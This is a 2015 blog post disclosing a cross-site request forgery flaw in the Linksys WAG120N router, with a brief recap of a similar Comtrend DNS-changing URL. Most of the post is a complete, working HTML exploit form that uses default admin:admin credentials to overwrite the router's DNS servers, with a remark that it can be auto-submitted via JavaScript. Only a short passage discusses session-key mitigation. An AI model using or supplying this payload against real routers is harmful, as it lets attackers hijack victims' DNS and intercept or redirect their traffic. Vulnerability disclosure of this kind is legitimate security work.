Sunday, August 23, 2015

Cross site request forgery vulnerability in Linksys WAG120N

In my previous post i described a vulnerability that would let configure DNS in multiple models of Comtrend routers by clicking an url like this:

http://admin:admin@192.168.1.1/dnscfg.cgi?dnsRefresh=1&dnsPrimary=ip_address_malicious_dns_server&dnsSecondary=ip_address_malicious_dns_server2

I am pretty sure that many models of Comtrend and other manufacturers suffer vulnerabilities of this type. In this post i am going to describe how to attack a router Linksys WAG120N in a similar way.


Linksys WAG120N won’t accept the configuration if it is sent in the url by method GET. It is necessary to send the configuration by method POST, so in this case we will need to create an HTML with a <form> with the parameters that we want to send to the router. We will put router’s default values and we will change only user and password and DNS addresses:

<html>
 <head>
 </head>
 <body>
 <form name="setup" method="POST" action="http://admin:admin@192.168.1.1/setup.cgi">
 ...
 ...
 <INPUT type="text" name="PoeUserName" value="admin" maxLength="62" size="26" >
 <INPUT type="password" name="PoePasswd" value="admin" maxLength="43" size="26" >
 ...
 ...
 <input type="hidden" name="c4_static_dns0_" value="1.2.3.4">
 <input type="hidden" name="c4_static_dns1_" value="5.6.7.8">
 <input type="hidden" name="c4_static_dns2_" value="9.10.11.12">
 ...
 ...
 <input type="submit">
 </form>
 </body>
</html>
If a user visit this HTML, when the form is submitted (it could be submitted automatically with javascript) the router configuration is changed (in this example DNS addresses given by DHCP are configured but any configuration could be modified). The complete HTML code is in the end of this article.

I am almost sure other models of different manufacturers can be configured in similar ways. From my point of view, routers interfaces should only accept new incoming connections to a welcome page. In that welcome page, a session key should be generated and kept while the session is open. In this way a user could not go directly to critical configuration menus. For example, a user could not go directly to the menu to configure DNS addresses, because he must go to the welcome page first, where a session key is generated, assigned and validated when critical configurations are going to be changed.

Mitigation:

Internet Explorer doesn’t accept username and password in the URL of the form action (I mean the syntax http://user:password@domain.com). Currently chrome and firefox are accepting username and password in the URL. I don’t know about other browsers.

Complete HTML:

<html>
 <head>
 </head>
 <body>
 <form name="setup" method="POST" action="http://admin:admin@192.168.1.1/setup.cgi">
 <INPUT type="radio" name="wan_multiplex" value="llc">
 <INPUT type="radio" name="wan_multiplex" value="vc">
 <INPUT type="radio" name="pppoa_multiplex" value="llc">
 <INPUT type="radio" name="pppoa_multiplex" value="vc">
 <INPUT type="text" class="num" maxlength="5" size="5" value="" name="wan_pcr">
 <INPUT type="text" class="num" maxlength="5" size="5" value="" name="wan_scr">
 <INPUT type="radio" name="wan_autodetect" value="enable">
 <INPUT type="radio" name="wan_autodetect" value="disable">
 <INPUT type="text" class="num" maxlength="3" size="5" value="0" name="wan_vpi">
 <INPUT type="text" class="num" maxlength="5" size="5" value="38" name="wan_vci">
 <INPUT type="radio" name="bridged_dhcpenable" value="dhcp">
 <INPUT type="radio" name="bridged_dhcpenable" value="fixedip">
 <INPUT type="text" name="wan_ip_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_ip_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_ip_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_ip_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="PoeUserName" value="admin" maxLength="62" size="26" >
 <INPUT type="password" name="PoePasswd" value="admin" maxLength="43" size="26" >
 <INPUT type="text" name="PoeService" value="" maxLength="43" size="26" >
 <INPUT type="radio" name="pppoeDODC" value="pppoeDODC">
 <INPUT type="text" class="num" name="poeIdleTime" value="5" maxLength="4" size="4" >
 <INPUT type="radio" name="pppoeDODC" value="pppoeKA">
 <INPUT type="text" class="num" name="pppoeRedialTime" value="30" maxLength="3" size="4" >
 <INPUT type="text" name="bpas_ip_1" value="" class="num" maxlength="3" size="3" >
 <INPUT type="text" name="bpas_ip_2" value="" class="num" maxlength="3" size="3" >
 <INPUT type="text" name="bpas_ip_3" value="" class="num" maxlength="3" size="3" >
 <INPUT type="text" name="bpas_ip_4" value="" class="num" maxlength="3" size="3" >
 <INPUT type="text" name="bpaUserName" value="" maxLength="62" size="26" >
 <INPUT type="password" name="bpaPasswd" value="" maxLength="43" size="26" >
 <INPUT type="radio" name="bpaDODC" value="bpaDODC">
 <INPUT type="text" name="bpaIdleTime" value="5" class="num" maxLength="2" size="4" >
 <INPUT type="radio" name="bpaDODC" value="bpaKA">
 <INPUT type="text" name="bpaRedialTime" value="30" class="num" maxLength="3" size="4" >
 <INPUT type="text" name="hostname" value="" maxlength="30" size="26">
 <INPUT type="text" name="domainname" value="" maxlength="62" size="26" >
 <INPUT type="text" name="mtu_size" value="1492" class="num" maxLength="5" size="5" >
 <INPUT type="text" name="lan_ip_1" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="lan_ip_2" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="lan_ip_3" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="text" name="lan_ip_4" value="" class="ipnum" maxlength="3" size="3">
 <INPUT type="radio" name="lan_dhcp" value="enable">
 <INPUT type="radio" name="lan_dhcp" value="disable">
 <INPUT type="radio" name="lan_dhcp" value="relay">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_1">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_2">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_3">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_4">
 <INPUT class="ipnum" maxlength="3" size="3" value="100" name="dhcp_start">
 <INPUT type="text" class="num" maxlength="3" size="3" value="50" name="dhcp_num">
 <INPUT type="text" class="num" maxlength="4" size="4" value="0" name="dhcp_lease">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_4">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_4">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_4">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_4">
 <INPUT type="checkbox" name="auto_dls" value="auto_dls">
 <input type="hidden" name="h_ethwan_enable" value="disable">
 <input type="hidden" name="c4_wan_ip_" value="">
 <input type="hidden" name="c4_wan_mask_" value="">
 <input type="hidden" name="c4_wan_gw_" value="">
 <input type="hidden" name="c4_wan_dns1_" value="">
 <input type="hidden" name="c4_wan_dns2_" value="">
 <input type="hidden" name="c4_lan_ip_" value="192.168.1.1">
 <input type="hidden" name="c4_dhcpserver_ip_" value="">
 <input type="hidden" name="c4_static_dns0_" value="1.2.3.4">
 <input type="hidden" name="c4_static_dns1_" value="5.6.7.8">
 <input type="hidden" name="c4_static_dns2_" value="9.10.11.12">
 <input type="hidden" name="c4_wan_wins_" value="">
 <input type="hidden" name="c4_bpas_ip_" value=""> 
 <input type="hidden" name="h_bpaDODC" value="bpaDODC">
 <input type="hidden" name="h_wan_encapmode" value="pppoa">
 <input type="hidden" name="h_wan_multiplex" value="llc">
 <input type="hidden" name="h_pppoa_multiplex" value="llc">
 <input type="hidden" name="h_wan_qostype" value="ubr">
 <input type="hidden" name="h_dsl_mode" value="a">
 <input type="hidden" name="h_wan_autodetect" value="enable">
 <input type="hidden" name="h_bridged_dhcpenable" value="dhcp">
 <input type="hidden" name="h_pppoeDODC" value="pppoeDODC">
 <input type="hidden" name="h_mtu_type" value="auto">
 <input type="hidden" name="h_lan_mask" value="0">
 <input type="hidden" name="h_lan_dhcp" value="enable">
 <input type="hidden" name="h_time_zone" value="+0 2">
 <input type="hidden" name="h_auto_dls" value="disable">
 <input type="hidden" name="PppoeUserName" value="">
 <input type="hidden" name="PppoePasswd" value="">
 <input type="hidden" name="PppoeService" value="">
 <input type="hidden" name="PppoaUserName" value="admin">
 <input type="hidden" name="PppoaPasswd" value="admin">
 <input type="hidden" name="oldip" value="192.168.1.1">
 <input type="hidden" name="h_upgrade_langpkt" value="1">
 <input type="hidden" name="todo" value="save">
 <input type="hidden" name="this_file" value="Setup.htm">
 <input type="hidden" name="next_file" value="Setup.htm">
 <input type="hidden" name="message" value=""> 
 <input type="hidden" name="h_wps_cur_status" value=""> 
 <input type="submit">
 </form>
 </body>
</html>

No comments:

Post a Comment